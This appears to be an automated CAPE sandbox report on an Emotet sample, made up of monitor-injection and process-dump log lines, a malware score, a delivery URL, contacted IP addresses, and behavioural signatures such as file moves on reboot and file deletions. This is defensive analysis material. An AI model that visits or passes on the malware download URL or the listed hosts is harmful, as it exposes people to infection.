2019-05-14 15:43:54,611 [root] INFO: Announced 64-bit process name: OSPPSVC.EXE pid: 2660
2019-05-14 15:43:54,674 [root] DEBUG: DLL unloaded from 0x000007FEF3D10000.
2019-05-14 15:43:54,736 [root] DEBUG: DLL loaded at 0x000007FEFB1A0000: C:\Windows\system32\IPHLPAPI (0x27000 bytes).
2019-05-14 15:43:54,720 [lib.api.process] DEBUG: Using QueueUserAPC injection.
2019-05-14 15:43:54,845 [root] DEBUG: DLL loaded at 0x000007FEFB190000: C:\Windows\system32\WINNSI (0xb000 bytes).
2019-05-14 15:43:54,877 [lib.api.process] INFO: Option 'procdump' with value '1' sent to monitor
2019-05-14 15:43:54,877 [lib.api.process] INFO: 64-bit DLL to inject is C:\tcjnwjnzzp\dll\XgmKYpN.dll, loader C:\tcjnwjnzzp\bin\UCNgMgBu.exe
2019-05-14 15:43:54,970 [root] DEBUG: DLL loaded at 0x000007FEFB000000: C:\Windows\system32\dhcpcsvc6 (0x11000 bytes).
2019-05-14 15:43:55,002 [root] DEBUG: ReadConfig: Successfully loaded pipe name \\.\PIPE\OcFYdy.
2019-05-14 15:43:55,002 [root] DEBUG: DLL unloaded from 0x000007FEF9A40000.
2019-05-14 15:43:55,079 [root] DEBUG: DLL loaded at 0x000007FEFAEC0000: C:\Windows\system32\dhcpcsvc (0x18000 bytes).
2019-05-14 15:43:55,141 [root] DEBUG: Loader: Injecting process 2660 (thread 2320) with C:\tcjnwjnzzp\dll\XgmKYpN.dll.
2019-05-14 15:43:55,220 [root] DEBUG: DLL unloaded from 0x000007FEF92D0000.
2019-05-14 15:43:55,236 [root] DEBUG: DLL unloaded from 0x0000000077380000.
2019-05-14 15:43:55,236 [root] DEBUG: Process image base: 0x00000000FF3E0000
2019-05-14 15:43:55,375 [root] DEBUG: DLL unloaded from 0x000007FEF9A40000.
2019-05-14 15:43:55,391 [root] DEBUG: DLL unloaded from 0x0000000077260000.
2019-05-14 15:43:55,437 [root] DEBUG: InjectDllViaIAT: IAT patching with dll name C:\tcjnwjnzzp\dll\XgmKYpN.dll.
2019-05-14 15:43:55,516 [root] DEBUG: DLL loaded at 0x000007FEFC760000: C:\Windows\system32\credssp (0xa000 bytes).
2019-05-14 15:43:55,562 [root] DEBUG: InjectDllViaIAT: Found a free region from 0x00000000FF894000 - 0x000007FEFF6A0000
2019-05-14 15:43:55,594 [root] DEBUG: DLL unloaded from 0x000007FEF3D10000.
2019-05-14 15:43:55,671 [root] DEBUG: DLL unloaded from 0x000007FEFCB60000.
2019-05-14 15:43:55,703 [root] DEBUG: InjectDllViaIAT: Allocated 0x204 bytes for new import table at 0x00000000FF8A0000.
2019-05-14 15:43:55,782 [root] DEBUG: DLL unloaded from 0x000007FEF9A20000.
2019-05-14 15:43:55,859 [root] DEBUG: InjectDllViaIAT: Successfully patched IAT.
2019-05-14 15:43:55,969 [root] DEBUG: DLL loaded at 0x000007FEF9C30000: C:\Windows\system32\prntvpt (0x2a000 bytes).
2019-05-14 15:43:56,000 [root] DEBUG: Successfully injected DLL C:\tcjnwjnzzp\dll\XgmKYpN.dll.
2019-05-14 15:43:56,078 [root] DEBUG: DLL loaded at 0x000007FEFC980000: C:\Windows\system32\DNSAPI (0x5b000 bytes).
2019-05-14 15:43:56,094 [lib.api.process] INFO: Injected into suspended 64-bit process with pid 2660
2019-05-14 15:43:56,233 [root] DEBUG: DLL loaded at 0x000007FEFA590000: C:\Windows\system32\rasadhlp (0x8000 bytes).
2019-05-14 15:43:56,250 [root] DEBUG: DLL unloaded from 0x000007FEF9A40000.
2019-05-14 15:43:56,312 [root] DEBUG: Terminate processes on terminate_event enabled.
2019-05-14 15:43:56,437 [root] DEBUG: DLL unloaded from 0x000007FEF92D0000.
2019-05-14 15:43:56,483 [root] DEBUG: Process dumps enabled.
2019-05-14 15:43:56,654 [root] DEBUG: DLL unloaded from 0x000007FEF9A40000.
2019-05-14 15:43:56,701 [root] INFO: Disabling sleep skipping.
2019-05-14 15:43:56,858 [root] WARNING: Unable to place hook on LockResource
2019-05-14 15:43:56,858 [root] DEBUG: DLL unloaded from 0x000007FEF92D0000.
2019-05-14 15:43:56,858 [root] WARNING: Unable to hook LockResource
2019-05-14 15:43:56,874 [root] DEBUG: RestoreHeaders: Restored original import table.
2019-05-14 15:43:56,874 [root] DEBUG: CAPE initialised: 64-bit base package loaded in process 2660 at 0x0000000074260000, image base 0x00000000FF3E0000, stack from 0x0000000000145000-0x0000000000150000
2019-05-14 15:43:56,874 [root] DEBUG: Commandline: C:\Windows\sysnative\"C:\Program Files\Common Files\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE".
2019-05-14 15:43:56,904 [root] INFO: Added new process to list with pid: 2660
2019-05-14 15:43:56,904 [root] DEBUG: DLL unloaded from 0x000007FEF9A40000.
2019-05-14 15:43:56,904 [root] INFO: Monitor successfully loaded in process with pid 2660.
2019-05-14 15:43:56,983 [root] DEBUG: DLL unloaded from 0x000007FEF3D10000.
2019-05-14 15:43:57,013 [root] DEBUG: DLL loaded at 0x000007FEFD1C0000: C:\Windows\system32\CRYPTBASE (0xf000 bytes).
2019-05-14 15:43:57,778 [root] DEBUG: DLL unloaded from 0x74120000.
2019-05-14 15:43:57,871 [root] DEBUG: DLL loaded at 0x741E0000: C:\Program Files (x86)\Microsoft Office\Office14\msproof7 (0x39000 bytes).
2019-05-14 15:43:57,903 [root] DEBUG: DLL loaded at 0x000007FEFD270000: C:\Windows\system32\RpcRtRemote (0x14000 bytes).
2019-05-14 15:43:58,043 [root] DEBUG: Timer callback hook: passing to callback at 0x00000000FF466D7C.
2019-05-14 15:43:58,043 [root] DEBUG: DLL loaded at 0x000007FEFCB60000: C:\Windows\system32\CRYPTSP (0x17000 bytes).
2019-05-14 15:43:58,089 [root] DEBUG: DLL loaded at 0x000007FEFC860000: C:\Windows\system32\rsaenh (0x47000 bytes).
2019-05-14 15:43:58,105 [root] DEBUG: set_caller_info: Adding region at 0x00000000002B0000 to caller regions list (advapi32::RegOpenKeyExW).
2019-05-14 15:43:58,137 [root] DEBUG: set_caller_info: Adding region at 0x0000000002090000 to caller regions list (msvcrt::memcpy).
2019-05-14 15:43:58,746 [root] DEBUG: DLL loaded at 0x000007FEFB0F0000: C:\Windows\System32\fwpuclnt (0x53000 bytes).
2019-05-14 15:43:59,042 [root] DEBUG: DLL loaded at 0x0000000074440000: C:\Windows\system32\security (0x3000 bytes).
2019-05-14 15:43:59,042 [root] DEBUG: DLL loaded at 0x0000000069AB0000: C:\Program Files\Common Files\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPOBJS (0x215000 bytes).
2019-05-14 15:43:59,072 [root] DEBUG: DLL loaded at 0x000007FEFC8F0000: C:\Windows\system32\schannel (0x57000 bytes).
2019-05-14 15:43:59,072 [root] DEBUG: DLL loaded at 0x000007FEFC980000: C:\Windows\system32\DNSAPI (0x5b000 bytes).
2019-05-14 15:43:59,088 [root] DEBUG: DLL loaded at 0x000007FEFDE90000: C:\Windows\system32\WS2_32 (0x4d000 bytes).
2019-05-14 15:43:59,135 [root] DEBUG: DLL loaded at 0x000007FEFDF00000: C:\Windows\system32\NSI (0x8000 bytes).
2019-05-14 15:43:59,167 [root] DEBUG: DLL loaded at 0x000007FEFE400000: C:\Windows\system32\OLEAUT32 (0xd7000 bytes).
2019-05-14 15:43:59,604 [root] DEBUG: DLL loaded at 0x0000000516F00000: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\diasymreader (0xc6000 bytes).
2019-05-14 15:44:18,121 [root] DEBUG: DLL loaded at 0x000007FEFD160000: C:\Windows\system32\apphelp (0x57000 bytes).
2019-05-14 15:44:18,183 [root] DEBUG: DLL loaded at 0x000007FEF7A70000: C:\Windows\System32\shdocvw (0x34000 bytes).
2019-05-14 15:44:24,065 [root] DEBUG: DLL loaded at 0x000007FEFF4A0000: C:\Windows\system32\urlmon (0x178000 bytes).
2019-05-14 15:44:24,065 [root] DEBUG: DLL unloaded from 0x000007FEF9A40000.
2019-05-14 15:44:24,142 [root] DEBUG: DLL unloaded from 0x000007FEF3D10000.
2019-05-14 15:44:26,046 [root] DEBUG: DLL unloaded from 0x000007FEFDF10000.
2019-05-14 15:44:30,506 [root] INFO: Stopped Task Scheduler Service
2019-05-14 15:44:30,506 [root] DEBUG: DLL unloaded from 0x6A620000.
2019-05-14 15:44:30,506 [root] DEBUG: DLL loaded at 0x000007FEFD720000: C:\Windows\system32\WININET (0x12a000 bytes).
2019-05-14 15:44:30,585 [root] DEBUG: DLL unloaded from 0x000007FEF9A40000.
2019-05-14 15:44:30,678 [root] DEBUG: DLL unloaded from 0x000007FEF92D0000.
2019-05-14 15:44:30,678 [root] DEBUG: DLL loaded at 0x000007FEFDA50000: C:\Windows\system32\iertutil (0x259000 bytes).
2019-05-14 15:44:30,897 [root] DEBUG: DLL unloaded from 0x000007FEF9A40000.
2019-05-14 15:44:30,928 [root] INFO: Started Task Scheduler Service
2019-05-14 15:44:30,944 [root] DEBUG: DLL unloaded from 0x000007FEF92D0000.
2019-05-14 15:44:30,960 [lib.api.process] DEBUG: Using CreateRemoteThread injection.
2019-05-14 15:44:31,022 [lib.api.process] INFO: Option 'procdump' with value '1' sent to monitor
2019-05-14 15:44:31,052 [lib.api.process] INFO: 64-bit DLL to inject is C:\tcjnwjnzzp\dll\XgmKYpN.dll, loader C:\tcjnwjnzzp\bin\UCNgMgBu.exe
2019-05-14 15:44:31,099 [root] DEBUG: ReadConfig: Successfully loaded pipe name \\.\PIPE\OcFYdy.
2019-05-14 15:44:31,224 [root] DEBUG: Loader: Injecting process 816 (thread 0) with C:\tcjnwjnzzp\dll\XgmKYpN.dll.
2019-05-14 15:44:31,256 [root] INFO: Announced 32-bit process name: 531.exe pid: 1408
2019-05-14 15:44:31,272 [root] DEBUG: InjectDll: No thread ID supplied. Initial thread ID 820, handle 0x84
2019-05-14 15:44:31,286 [lib.api.process] DEBUG: Using QueueUserAPC injection.
2019-05-14 15:44:31,319 [root] DEBUG: Process image base: 0x00000000FF8E0000
2019-05-14 15:44:31,365 [lib.api.process] INFO: Option 'procdump' with value '1' sent to monitor
2019-05-14 15:44:31,381 [root] DEBUG: InjectDllViaIAT: Not a new process, aborting IAT patch
2019-05-14 15:44:31,427 [lib.api.process] INFO: 32-bit DLL to inject is C:\tcjnwjnzzp\dll\WxChra.dll, loader C:\tcjnwjnzzp\bin\nQdUxdR.exe
2019-05-14 15:44:31,443 [root] DEBUG: InjectDll: IAT patching failed, falling back to thread injection.
2019-05-14 15:44:31,490 [root] DEBUG: ReadConfig: Successfully loaded pipe name \\.\PIPE\OcFYdy.
2019-05-14 15:44:31,506 [root] DEBUG: Terminate processes on terminate_event enabled.
2019-05-14 15:44:31,568 [root] DEBUG: Loader: Injecting process 1408 (thread 2784) with C:\tcjnwjnzzp\dll\WxChra.dll.
2019-05-14 15:44:31,584 [root] DEBUG: Process dumps enabled.
2019-05-14 15:44:31,645 [root] DEBUG: Process image base: 0x00400000
2019-05-14 15:44:31,709 [root] INFO: Disabling sleep skipping.
2019-05-14 15:44:31,740 [root] DEBUG: InjectDllViaIAT: IAT patching with dll name C:\tcjnwjnzzp\dll\WxChra.dll.
2019-05-14 15:44:31,786 [root] WARNING: Unable to place hook on LockResource
2019-05-14 15:44:31,818 [root] DEBUG: InjectDllViaIAT: Found a free region from 0x0041F000 - 0x77380000
2019-05-14 15:44:31,865 [root] WARNING: Unable to hook LockResource
2019-05-14 15:44:31,911 [root] DEBUG: InjectDllViaIAT: Allocated 0x1dc bytes for new import table at 0x00420000.
2019-05-14 15:44:31,957 [root] DEBUG: CAPE initialised: 64-bit base package loaded in process 816 at 0x0000000074260000, image base 0x00000000FF8E0000, stack from 0x0000000000EC6000-0x0000000000ED0000
2019-05-14 15:44:31,989 [root] DEBUG: InjectDllViaIAT: Successfully patched IAT.
2019-05-14 15:44:32,036 [root] DEBUG: Commandline: C:\Windows\sysnative\svchost.exe -k netsvcs.
2019-05-14 15:44:32,052 [root] DEBUG: Successfully injected DLL C:\tcjnwjnzzp\dll\WxChra.dll.
2019-05-14 15:44:32,130 [lib.api.process] INFO: Injected into suspended 32-bit process with pid 1408
2019-05-14 15:44:32,130 [root] INFO: Added new process to list with pid: 816
2019-05-14 15:44:32,239 [root] INFO: Monitor successfully loaded in process with pid 816.
2019-05-14 15:44:32,255 [root] DEBUG: DLL unloaded from 0x000007FEF9A20000.
2019-05-14 15:44:32,316 [root] DEBUG: Terminate processes on terminate_event enabled.
2019-05-14 15:44:32,332 [root] DEBUG: InjectDllViaThread: Successfully injected Dll into process via RtlCreateUserThread.
2019-05-14 15:44:32,394 [root] DEBUG: Process dumps enabled.
2019-05-14 15:44:32,426 [root] DEBUG: DLL unloaded from 0x000007FEF9A40000.
2019-05-14 15:44:32,426 [root] DEBUG: InjectDll: Successfully injected DLL via thread.
2019-05-14 15:44:32,551 [root] DEBUG: DLL unloaded from 0x000007FEFB340000.
2019-05-14 15:44:32,551 [root] DEBUG: Successfully injected DLL C:\tcjnwjnzzp\dll\XgmKYpN.dll.
2019-05-14 15:44:32,551 [root] INFO: Disabling sleep skipping.
2019-05-14 15:44:32,612 [root] DEBUG: RestoreHeaders: Restored original import table.
2019-05-14 15:44:32,628 [root] DEBUG: CAPE initialised: 32-bit base package loaded in process 1408 at 0x747a0000, image base 0x400000, stack from 0x187000-0x190000
2019-05-14 15:44:32,628 [root] DEBUG: DLL unloaded from 0x000007FEF3D10000.
2019-05-14 15:44:32,785 [root] DEBUG: Commandline: C:\Windows\System32\"C:\Users\user\531.exe".
2019-05-14 15:44:32,815 [root] INFO: Added new process to list with pid: 1408
2019-05-14 15:44:32,815 [root] INFO: Monitor successfully loaded in process with pid 1408.
2019-05-14 15:44:33,253 [root] DEBUG: DLL unloaded from 0x000007FEF9A40000.
2019-05-14 15:44:33,408 [root] DEBUG: DLL unloaded from 0x000007FEF92D0000.
2019-05-14 15:44:33,517 [root] DEBUG: NtTerminateProcess hook: Attempting to dump process 308
2019-05-14 15:44:33,533 [root] DEBUG: GetHookCallerBase: thread 1992 (handle 0x0), return address 0x000000013FAEC504, allocation base 0x000000013FAE0000.
2019-05-14 15:44:33,595 [root] DEBUG: DumpInterestingRegions: Dumping Imagebase at 0x000000013FAE0000.
2019-05-14 15:44:33,642 [root] DEBUG: DumpProcess: Instantiating PeParser with address: 0x000000013FAE0000.
2019-05-14 15:44:33,704 [root] DEBUG: DumpProcess: Module entry point VA is 0x000000000000C63C.
2019-05-14 15:44:33,892 [root] DEBUG: DLL unloaded from 0x000007FEF9A40000.
2019-05-14 15:44:34,002 [root] INFO: Added new CAPE file to list with path: C:\gpkjls\CAPE\308_10414431325341814252019
2019-05-14 15:44:34,016 [root] DEBUG: DLL unloaded from 0x76A70000.
2019-05-14 15:44:34,111 [root] DEBUG: DumpProcess: Module image dump success - dump size 0x73e00.
2019-05-14 15:44:34,220 [root] DEBUG: DLL loaded at 0x000007FEFAE90000: C:\Windows\system32\netutils (0xc000 bytes).
2019-05-14 15:44:34,220 [root] DEBUG: DLL unloaded from 0x000007FEFBAE0000.
2019-05-14 15:44:34,328 [root] DEBUG: DLL unloaded from 0x000007FEFC8F0000.
2019-05-14 15:44:34,391 [root] DEBUG: DLL unloaded from 0x000007FEFC760000.
2019-05-14 15:44:34,391 [root] DEBUG: set_caller_info: Adding region at 0x00280000 to caller regions list (ntdll::LdrGetProcedureAddress).
2019-05-14 15:44:34,423 [root] DEBUG: DLL unloaded from 0x000007FEF92D0000.
2019-05-14 15:44:34,423 [root] DEBUG: DLL unloaded from 0x0000000077260000.
2019-05-14 15:44:34,470 [root] DEBUG: DLL unloaded from 0x000007FEF2270000.
2019-05-14 15:44:34,470 [root] DEBUG: DLL unloaded from 0x00400000.
2019-05-14 15:44:34,470 [root] DEBUG: DLL unloaded from 0x000007FEF9A20000.
2019-05-14 15:44:34,470 [root] DEBUG: DLL unloaded from 0x000007FEF7960000.
2019-05-14 15:44:34,516 [root] DEBUG: DLL loaded at 0x74CB0000: C:\Windows\system32\apphelp (0x4c000 bytes).
2019-05-14 15:44:34,516 [root] DEBUG: DLL unloaded from 0x000007FEFC400000.
2019-05-14 15:44:34,532 [root] DEBUG: DLL unloaded from 0x000007FEFE6E0000.
2019-05-14 15:44:34,562 [root] INFO: Notified of termination of process with pid 308.
2019-05-14 15:44:34,562 [root] INFO: Announced 32-bit process name: 531.exe pid: 1936
2019-05-14 15:44:34,578 [lib.api.process] DEBUG: Using QueueUserAPC injection.
2019-05-14 15:44:34,578 [lib.api.process] INFO: Option 'procdump' with value '1' sent to monitor
2019-05-14 15:44:34,578 [lib.api.process] INFO: 32-bit DLL to inject is C:\tcjnwjnzzp\dll\WxChra.dll, loader C:\tcjnwjnzzp\bin\nQdUxdR.exe
2019-05-14 15:44:34,641 [root] INFO: Process with pid 308 has terminated
2019-05-14 15:44:34,766 [root] DEBUG: DLL loaded at 0x000007FEFE640000: C:\Windows\system32\CLBCatQ (0x99000 bytes).
2019-05-14 15:44:34,766 [root] DEBUG: ReadConfig: Successfully loaded pipe name \\.\PIPE\OcFYdy.
2019-05-14 15:44:34,782 [root] DEBUG: Loader: Injecting process 1936 (thread 2084) with C:\tcjnwjnzzp\dll\WxChra.dll.
2019-05-14 15:44:34,828 [root] DEBUG: Process image base: 0x00400000
2019-05-14 15:44:34,828 [root] DEBUG: DLL loaded at 0x000007FEFB3D0000: C:\Windows\system32\taskschd (0x127000 bytes).
2019-05-14 15:44:34,828 [root] DEBUG: InjectDllViaIAT: IAT patching with dll name C:\tcjnwjnzzp\dll\WxChra.dll.
2019-05-14 15:44:34,891 [root] DEBUG: InjectDllViaIAT: Found a free region from 0x0041F000 - 0x77380000
2019-05-14 15:44:34,891 [root] DEBUG: InjectDllViaIAT: Allocated 0x1dc bytes for new import table at 0x00420000.
2019-05-14 15:44:34,937 [root] DEBUG: InjectDllViaIAT: Successfully patched IAT.
2019-05-14 15:44:34,953 [root] DEBUG: Successfully injected DLL C:\tcjnwjnzzp\dll\WxChra.dll.
2019-05-14 15:44:34,953 [lib.api.process] INFO: Injected into suspended 32-bit process with pid 1936
2019-05-14 15:44:34,953 [root] DEBUG: Terminate processes on terminate_event enabled.
2019-05-14 15:44:35,000 [root] DEBUG: NtTerminateProcess hook: Attempting to dump process 1408
2019-05-14 15:44:35,000 [root] DEBUG: Process dumps enabled.
2019-05-14 15:44:35,000 [root] DEBUG: GetHookCallerBase: thread 2784 (handle 0x0), return address 0x0040CB8F, allocation base 0x00400000.
2019-05-14 15:44:35,016 [root] DEBUG: DumpInterestingRegions: Dumping Imagebase at 0x00400000.
2019-05-14 15:44:35,094 [root] DEBUG: DumpProcess: Instantiating PeParser with address: 0x00400000.
2019-05-14 15:44:35,094 [root] INFO: Disabling sleep skipping.
2019-05-14 15:44:35,108 [root] DEBUG: RestoreHeaders: Restored original import table.
2019-05-14 15:44:35,233 [root] DEBUG: DumpProcess: Module entry point VA is 0x0000C9A0.
2019-05-14 15:44:35,233 [root] DEBUG: CAPE initialised: 32-bit base package loaded in process 1936 at 0x747a0000, image base 0x400000, stack from 0x186000-0x190000
2019-05-14 15:44:35,250 [root] INFO: Added new CAPE file to list with path: C:\gpkjls\CAPE\1408_13342311763541814252019
2019-05-14 15:44:35,265 [root] DEBUG: DumpProcess: Module image dump success - dump size 0x10200.
2019-05-14 15:44:35,280 [root] DEBUG: Commandline: C:\Windows\System32\--ea49317f.
2019-05-14 15:44:35,280 [root] INFO: Notified of termination of process with pid 1408.
2019-05-14 15:44:35,296 [root] INFO: Added new process to list with pid: 1936
2019-05-14 15:44:35,296 [root] INFO: Monitor successfully loaded in process with pid 1936.
2019-05-14 15:44:35,390 [root] DEBUG: DLL unloaded from 0x000007FEFB3D0000.
2019-05-14 15:44:35,654 [root] INFO: Process with pid 1408 has terminated
2019-05-14 15:44:37,137 [root] DEBUG: set_caller_info: Adding region at 0x00230000 to caller regions list (ntdll::LdrGetProcedureAddress).
2019-05-14 15:44:41,536 [root] DEBUG: DLL unloaded from 0x000007FEF9A40000.
2019-05-14 15:44:42,487 [root] DEBUG: DLL loaded at 0x76EA0000: C:\Windows\syswow64\OLEAUT32 (0x8f000 bytes).
2019-05-14 15:44:42,551 [root] DEBUG: DLL loaded at 0x74600000: C:\Windows\WinSxS\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32 (0x19e000 bytes).
2019-05-14 15:44:42,628 [root] DEBUG: DLL loaded at 0x75670000: C:\Windows\syswow64\CLBCatQ (0x83000 bytes).
2019-05-14 15:44:42,707 [root] DEBUG: DLL loaded at 0x74340000: C:\Windows\system32\propsys (0xf5000 bytes).
2019-05-14 15:44:42,862 [root] DEBUG: DLL loaded at 0x74BB0000: C:\Windows\system32\ntmarta (0x21000 bytes).
2019-05-14 15:44:42,956 [root] DEBUG: DLL loaded at 0x75860000: C:\Windows\syswow64\WLDAP32 (0x45000 bytes).
2019-05-14 15:44:43,128 [root] DEBUG: DLL loaded at 0x758B0000: C:\Windows\syswow64\SETUPAPI (0x19d000 bytes).
2019-05-14 15:44:43,220 [root] DEBUG: DLL loaded at 0x76A40000: C:\Windows\syswow64\CFGMGR32 (0x27000 bytes).
2019-05-14 15:44:43,283 [root] DEBUG: DLL loaded at 0x76770000: C:\Windows\syswow64\DEVOBJ (0x12000 bytes).
2019-05-14 15:44:43,283 [root] DEBUG: set_caller_info: Adding region at 0x0000000002AD0000 to caller regions list (msvcrt::memcpy).
2019-05-14 15:44:43,424 [root] DEBUG: DLL unloaded from 0x75B20000.
2019-05-14 15:44:43,517 [root] DEBUG: DLL unloaded from 0x000007FEF3D10000.
2019-05-14 15:44:43,627 [root] DEBUG: DLL unloaded from 0x6A620000.
2019-05-14 15:44:44,095 [root] DEBUG: DLL unloaded from 0x000007FEF9A40000.
2019-05-14 15:44:44,282 [root] DEBUG: DLL unloaded from 0x000007FEF92D0000.
2019-05-14 15:44:44,562 [root] DEBUG: DLL unloaded from 0x74340000.
2019-05-14 15:44:44,796 [root] DEBUG: DLL loaded at 0x74F80000: C:\Windows\system32\CRYPTSP (0x16000 bytes).
2019-05-14 15:44:44,858 [root] DEBUG: DLL unloaded from 0x000007FEF9A40000.
2019-05-14 15:44:45,015 [root] DEBUG: DLL unloaded from 0x751E0000.
2019-05-14 15:44:45,624 [root] DEBUG: DLL unloaded from 0x000007FEF92D0000.
2019-05-14 15:45:03,969 [root] DEBUG: DLL loaded at 0x74F40000: C:\Windows\system32\rsaenh (0x3b000 bytes).
2019-05-14 15:45:03,969 [root] DEBUG: DLL unloaded from 0x000007FEF3560000.
2019-05-14 15:45:03,984 [root] DEBUG: DLL unloaded from 0x0000000069AB0000.
2019-05-14 15:45:09,944 [root] DEBUG: DLL loaded at 0x74B10000: C:\Windows\system32\RpcRtRemote (0xe000 bytes).
2019-05-14 15:45:09,944 [root] DEBUG: set_caller_info: Adding region at 0x000007FEF4240000 to caller regions list (kernel32::GetSystemTimeAsFileTime).
2019-05-14 15:45:09,944 [root] DEBUG: DLL unloaded from 0x000007FEFA5B0000.
2019-05-14 15:45:09,960 [root] DEBUG: DLL loaded at 0x74520000: C:\Windows\system32\mssprxy (0xc000 bytes).
2019-05-14 15:45:10,006 [root] DEBUG: DLL unloaded from 0x74520000.
2019-05-14 15:45:21,924 [root] DEBUG: DLL unloaded from 0x000007FEF9C60000.
2019-05-14 15:45:21,924 [root] DEBUG: DLL loaded at 0x000007FEFDCB0000: C:\Windows\system32\SETUPAPI (0x1d7000 bytes).
2019-05-14 15:45:21,924 [root] DEBUG: DLL unloaded from 0x75B20000.
2019-05-14 15:45:21,956 [root] DEBUG: set_caller_info: Adding region at 0x0000000002430000 to caller regions list (msvcrt::memcpy).
2019-05-14 15:45:21,956 [root] DEBUG: DLL unloaded from 0x000007FEFE500000.
2019-05-14 15:45:21,956 [root] DEBUG: set_caller_info: Adding region at 0x000007FEF9A60000 to caller regions list (msvcrt::memcpy).
2019-05-14 15:45:21,956 [root] DEBUG: set_caller_info: Adding region at 0x0000000000010000 to caller regions list (msvcrt::memcpy).
2019-05-14 15:45:33,999 [root] DEBUG: DLL loaded at 0x000007FEFD660000: C:\Windows\system32\CFGMGR32 (0x36000 bytes).
2019-05-14 15:45:33,999 [root] DEBUG: DLL unloaded from 0x000007FEF96B0000.
2019-05-14 15:45:33,999 [root] DEBUG: DLL unloaded from 0x000007FEFDF10000.
2019-05-14 15:45:34,046 [root] DEBUG: DLL unloaded from 0x76A70000.
2019-05-14 15:45:34,108 [root] DEBUG: DLL unloaded from 0x000007FEFA1D0000.
2019-05-14 15:45:39,943 [root] DEBUG: DLL loaded at 0x3F100000: C:\Program Files (x86)\Microsoft Office\OFFICE14\PROOF\1033\MSGR3EN (0x311000 bytes).
2019-05-14 15:45:39,943 [root] DEBUG: DLL loaded at 0x000007FEFD3F0000: C:\Windows\system32\DEVOBJ (0x1a000 bytes).
2019-05-14 15:45:46,010 [root] INFO: Announced starting service "gluerel"
2019-05-14 15:45:46,010 [root] DEBUG: set_caller_info: Adding region at 0x000007FEFD160000 to caller regions list (ntdll::NtCreateFile).
2019-05-14 15:45:46,010 [root] DEBUG: set_caller_info: Adding region at 0x000007FEFD160000 to caller regions list (ntdll::NtCreateFile).
2019-05-14 15:45:46,105 [root] DEBUG: set_caller_info: Adding region at 0x095A0000 to caller regions list (advapi32::RegCreateKeyExA).
2019-05-14 15:45:46,105 [root] INFO: Announced 32-bit process name: gluerel.exe pid: 1232
2019-05-14 15:45:46,105 [lib.api.process] DEBUG: Using QueueUserAPC injection.
2019-05-14 15:45:53,921 [root] INFO: Announced starting service "WerSvc"
2019-05-14 15:45:53,936 [root] DEBUG: NtTerminateProcess hook: Attempting to dump process 1444
2019-05-14 15:45:53,936 [root] DEBUG: DLL loaded at 0x000007FEFD580000: C:\Windows\system32\WINTRUST (0x3a000 bytes).
2019-05-14 15:45:53,951 [lib.api.process] INFO: Option 'procdump' with value '1' sent to monitor
2019-05-14 15:45:53,951 [root] DEBUG: DLL loaded at 0x000007FEFD410000: C:\Windows\system32\CRYPT32 (0x167000 bytes).
2019-05-14 15:45:53,983 [lib.api.process] INFO: 32-bit DLL to inject is C:\tcjnwjnzzp\dll\WxChra.dll, loader C:\tcjnwjnzzp\bin\nQdUxdR.exe
2019-05-14 15:46:05,947 [root] DEBUG: DLL loaded at 0x000007FEFD370000: C:\Windows\system32\MSASN1 (0xf000 bytes).
2019-05-14 15:46:05,947 [root] DEBUG: GetHookCallerBase: thread 2160 (handle 0x0), return address 0x00000000FF3B9845, allocation base 0x00000000FF3B0000.
2019-05-14 15:46:05,947 [root] DEBUG: ReadConfig: Successfully loaded pipe name \\.\PIPE\OcFYdy.
2019-05-14 15:46:05,963 [root] DEBUG: DumpInterestingRegions: Dumping Imagebase at 0x00000000FF3B0000.
2019-05-14 15:46:05,980 [root] DEBUG: DumpProcess: Instantiating PeParser with address: 0x00000000FF3B0000.
2019-05-14 15:46:12,967 [root] DEBUG: DumpProcess: Module entry point VA is 0x000000000000A9B4.
2019-05-14 15:46:12,967 [root] DEBUG: set_caller_info: Adding region at 0x00000000000D0000 to caller regions list (setupapi::SetupDiGetClassDevsW).
2019-05-14 15:46:12,967 [root] DEBUG: Loader: Injecting process 1232 (thread 1880) with C:\tcjnwjnzzp\dll\WxChra.dll.
2019-05-14 15:46:12,967 [root] DEBUG: Process image base: 0x00400000
2019-05-14 15:46:12,983 [root] DEBUG: DumpProcess: Module image dump success - dump size 0x0.
2019-05-14 15:46:15,792 [root] DEBUG: InjectDllViaIAT: IAT patching with dll name C:\tcjnwjnzzp\dll\WxChra.dll.
2019-05-14 15:46:15,792 [root] DEBUG: DLL unloaded from 0x000007FEFC400000.
2019-05-14 15:46:15,792 [root] DEBUG: set_caller_info: Adding region at 0x0000000003790000 to caller regions list (msvcrt::memcpy).
2019-05-14 15:46:15,917 [root] DEBUG: InjectDllViaIAT: Found a free region from 0x0041F000 - 0x77380000
2019-05-14 15:46:15,917 [root] DEBUG: DLL unloaded from 0x000007FEFE6E0000.
2019-05-14 15:46:15,994 [root] INFO: Notified of termination of process with pid 1444.
2019-05-14 15:46:27,944 [root] DEBUG: InjectDllViaIAT: Allocated 0x1dc bytes for new import table at 0x00420000.
2019-05-14 15:46:27,944 [root] INFO: Process with pid 1444 has terminated
2019-05-14 15:46:27,944 [root] DEBUG: InjectDllViaIAT: Successfully patched IAT.

MalScore

10.0

Emotet

Machine

Name Label Manager Started On Shutdown On
target-02 target-02 ESX 2019-05-14 14:42:09 2019-05-14 14:46:46

URL Details

URL
http://test5.freebottlepc.com/tuzpq/FILE/cooujsc19a2cegnj6_tcmotog-266543746/

Signatures

Behavioural detection: Executable code extraction
SetUnhandledExceptionFilter detected (possible anti-debug)
Attempts to connect to a dead IP:Port (2 unique times)
IP: 204.79.197.200:80 (United States)
IP: 132.148.196.134:80 (United States)
Scheduled file move on reboot detected
File Move on Reboot: Old: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\BF9JT9UPQS3TEN97KVRT.temp -> New: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Yara rule detections observed from a process memory dump/dropped files/CAPE
Hit: PID 1408 trigged the Yara rule 'Emotet'
Possible date expiration check, exits too soon after checking local time
process: iexplore.exe, PID 548
Anomalous file deletion behavior detected (10+)
DeletedFile: C:\Users\user\AppData\LocalLow\Microsoft\Internet Explorer\Services\search_{0633EE93-D776-472f-A0FF-E1416B8B2E3A}.ico
